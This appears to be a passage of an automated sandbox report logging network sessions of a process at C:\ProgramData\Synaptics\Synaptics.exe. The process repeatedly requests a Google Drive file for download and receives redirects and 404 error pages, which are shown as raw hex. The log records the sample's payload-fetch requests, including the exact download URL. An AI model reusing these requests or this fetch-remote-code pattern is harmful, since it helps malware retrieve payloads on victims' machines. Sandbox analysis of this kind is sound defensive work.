                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-eYKfmEPJlh6HOX7era-ueQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 56 72 56 37 64 48 49 38 6f 66 57 51 6a 68 6b 72 4e 50 72 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="gVrV7dHI8ofWQjhkrNPrfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      51192.168.2.1149950172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Rxhu-n1JtOf-lwFea3Ea1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      52192.168.2.1149956142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:45 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:46 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6i05ZmoSTcfdBDubAg_ZLwyrl3uQP93IheTvSsGiO9PcKO0GIgCv68TVF8RzQQaAXfCL-IkJ0
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kJB-Bp7LAYnITYsJE7t17A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:46 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:46 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 4e 37 69 48 32 54 69 39 55 4c 65 65 4c 42 50 35 33 70 4c 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="QN7iH2Ti9ULeeLBP53pLnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:46 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      53192.168.2.1149957172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JEEB80Ht4uJKQLGdEggszg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      54192.168.2.1149958142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:45 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:46 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7AhhjpIL1Bq8HwZ7Hj_f8FmM_qaYZx-sWoEo9UUtDn_9o-K5Zkk5P6h7F7YrZ8dJMzZYGHB5E
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-OP74qrCDO80YX0KNG1IzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:46 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:46 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 4f 59 47 62 44 75 5a 6f 43 35 6d 67 6c 4a 56 5a 6d 6b 6e 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="vOYGbDuZoC5mglJVZmknAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:46 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      55192.168.2.1149964172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-hMqgeYX20jZACEhypk8WOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      56192.168.2.1149966142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:46 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5OQzorC_VRjjX91Eqr639HPJt6Ex0xcQM8dCajVRyhvtaykcIp1lRcHxj7-p5OqkCD
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-6WdV3s622MRrNsEv6h-DZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
